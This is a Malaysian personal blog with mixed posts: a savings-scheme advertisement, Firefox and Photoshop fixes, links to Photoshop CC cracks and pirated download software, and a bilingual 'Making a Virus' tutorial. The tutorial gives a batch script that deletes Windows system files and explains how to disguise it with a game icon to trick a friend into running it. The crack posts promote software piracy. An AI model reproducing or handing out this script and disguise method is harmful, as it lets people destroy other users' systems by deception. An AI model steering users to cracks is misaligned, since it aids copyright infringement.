Sabtu, 23 September 2017

4 Manfaat Dalam 1 Tabungan



Pastinya  kita mahukan yang terbaik untuk anak-anak kita... Semua kemahuan mereka kita cuba penuhi..kerana kita inginkan mereka sentiasa gembira...kita tidak mahu mereka merasa susah seperti kita dahulu.Tapi, satu perkara yang sering kita lupa......

ADAKAH KITA TELAH SEDIAKAN SIMPANAN  UNTUK MASA DEPAN PENDIDIKAN MEREKA??

Mulakan penabungan untuk anak-anak anda hari ini dengan SSPN-i Plus.

Serendah SERINGGIT sehari, anda ada simpanan dan dilindungi takaful sehingga RM40,000!

-Tabungan untuk diri sendiri pun boleh sambil mendapat manfaat perlindungan takaful yang mudah (dengan tabungan serendah rm1 sehari anda dilindungi takaful sebanyak rm40k dan elaun kemasukan hospital Rm20 sehari)

-Manfaat perlepasan cukai

- Manfaat cabutan wow setiap tahun oleh sspn-i plus,sambil menabung mana tahu rezeki anda untuk mendapat cabutan bertuah.

-Layak mendapat tajaan ptptn secara automatik serta dividen yang kompetitif  dan dilindungi oleh kerajaan.

Tunggu apa lagi jom klik disini https://goo.gl/18cYJx
 
Atau

Sila whatsapp saya di 0175408904




Ahad, 15 September 2013

Well,this is embarrassing. Firefox is having trouble recovering your Windows and tabs. This is usually caused by a recently opened web page. {FIXED}

What to do when you are having this problem?


1.Go to Firefox Search Bar and type in  about:config
2.If there is a pop up,just say OK.
3.There will be list of many codes,just search 
browser.sessionstore.resume_from_crash
4.At right,you will see the boolian as FALSE.Change it to TRUE
by right clicking and RESET.

If this problem is still happening and another Mozilla Crash Report comes 
out,there another method.

1.Go to your Firefox icon/shortcut.
2.Right click > PROPERTIES
3.A pop up comes out and go to COMPATIBILITY
4.Down below you will see a check box,check the "Run As Admin"
5.Apply.

This method should be done everytime updating Firefox.So,you better update 
it now!

Visit/Join HACKERS CAP AYAM  to share knowledge and ask questions!

Selasa, 13 Ogos 2013

Photoshop CC only black and white color problem [FIXED]

Hello everyone!
I was going around Photoshop CC when suddenly this problem appears.


I was only able to use the color Black and White and no other!
This is how I fixed it.

1.Find your Photoshop file.



2.Right after clicking it, hold ALT + CTRL + SHIFT as fast as you could.This will appear.



3. Click 'YES' This will reset all your settings until it looks like new.This is the only way to fiz it.Hope this helps you!~

Adobe Photoshop CC FREE!




Hello!


Today I am going to suggest you some video and link that provides link for Adobe Photoshop CC Cracks.Patching/cracking Adobe Photoshop CC is now tricky because it is now connected to CC (Creative Cloud)

Before any of the instructions,please visit Adobe's website to download Creative Cloud.Without this,you cannot download it.


Creative Cloud

After that,download Photoshop CC first! It may take a while.


Next, use one of these links as patch.

1. By TheMrExus on Youtube
 - http://adf.ly/TvHNJ

2. Full video Tutorial + Link by iKraZeeTV - http://adf.ly/TvJ1Z


Both of them are tested by me and works well.Please tell me in the comments if there is more!































Isnin, 29 Julai 2013

Internet Download Manager LATEST VERSION (6.17 Build 6)

Here are some links for the "Internet Download Manager LATEST VERSION (6.17 Build 6)"




Uploaded by mastersharefiles.blogspot.com - http://adf.ly/T4HfV   (support the owner)

Video and download link by Free Store Program - http://www.youtube.com/watch?v=lYjyTkY_tAo


If there is more links,please add in the comments below or contact at HCA 

Sabtu, 20 Julai 2013

Cara Sekat, Block Pop-Up, Ads

              Assalamualaikum semua,terima kasih melawat blog saya dan maaflah kerana jarang update blog kerana kekurangan masa,okey kita terus dengan perkongsian yang bermanfaat ini,apa yang bermanfaatnya?hehe ok saya nak share satu software nie yang dapat sekat Pop-Up atau Ads killer yang keluar iklan ntah apa2 tue bila anda layari laman web,semak kan bila klik jea laman web yang kita nak terus jer keluar satu lagi laman web berunsurkan iklan dan sebagainya malah lebih parah lagi jika iklan itu berbentuk lucah,iklan produk2 seks yang melampau batas iklan..haaa parah nie,mesti risau kan jika anak2 kita ker yang lihat iklan tue,tambah plak sekarang bulan puasa,okey selain tue software nie jugak dapat membantu kita dalam perlindungan malware,link phishing dan banyak lagi la.
              Yang penting software tersebut dapat mempercepatkan loading page yang kita layari kerana tiada lagi ads,pop-up loading yang semestinya mengurangkan kelajuan loading sesebuah laman web yang kita layari.

             Okeylah cerita panjang2 tak best la, korang mesti x larat baca kan,korang test sendiri la software nie baru taw power kea tak
Boleh klik disini untuk maklumat lanjut.

Nak Download terus software nie boleh klik Disini   

Selamat mencuba okey,semoga bermanfaat kepada pembaca Blog,Terima Kasih jumpa lagii !! :) 

Sedikit Preview Software nie





Selasa, 19 Februari 2013

Membuat Virus / Making a Virus


ENGLISH TRANSLATION BELOW


Di bawah ini merupakan tutorial membuat virus yang boleh men-delete file-file system di dalam PC/Laptop anda. Jadi segala tutorial di bawah ini tidak di tanggung oleh pihak kami. Harap maklum. Jika anda ingin mempelajari juga, sebaiknya janganlah men-click ataupun haruslah running di VMWareterlebih dahulu.


CARA - CARA :1) Buka Notepad.


2) Copy code di bawah :


@echo offdel "c:\windows\pchealth"del "c:\windows\system"del "c:\windows\system32\restore"del "c:\windows\system32\autoexec.nt"del "c:\windows\system32\ntoskrni.exe"del "c:\winlogon.exe"


3) Paste dalam Notepad.


4) Save As kepada fileanda.bat . Jadikan Save As Type: kepada All Files. Namakan fileanda diikuti dengan 2 digit nombor. Contoh, Fifa 10.bat


Tukar Icon File (Step ini nak buat tak apa, tak mahu buat pun tak apa)


5) Click kanan pada fileanda.bat > Create Shortcut . Terbina satu lagi fileanda di desktop.


6) Click kanan > Properties > Change Icon > tukarlah kepada icon mana yang anda mahu. Contoh saya menukarnya kepada icon Fifa 10.


____________________________________________________________________________________________________________

This is a tutorial on how to make a virus that can delete files in your/others system in yours/theirs PC or laptop.So,if anything happens please don't blame us,you've been warned.It's better if you don't click anything.You can run VMW first if you REALLY want to test it by yourself. 1) Open up Notepad. 2) Copy these codes :

@echo offdel "c:\windows\pchealth"del "c:\windows\system"del "c:\windows\system32\restore"del "c:\windows\system32\autoexec.nt"del "c:\windows\system32\ntoskrni.exe"del "c:\winlogon.exe"

3) Paste on Notepad 4) Save as a .bat extension (eg; poops.bat) Remember to choose ALL FILES and your file must be followed by two digits (final eg; poops 12.bat)
5)You can change the icon if you want(troll a friend)

How to change it?

Right click on poops12.bat > Create Shortcut and a file appears on your desktop.
Right click on the virus you made (DON'T CLICK) > Properties > Change Icon
Change to anything that you want.

Good luck!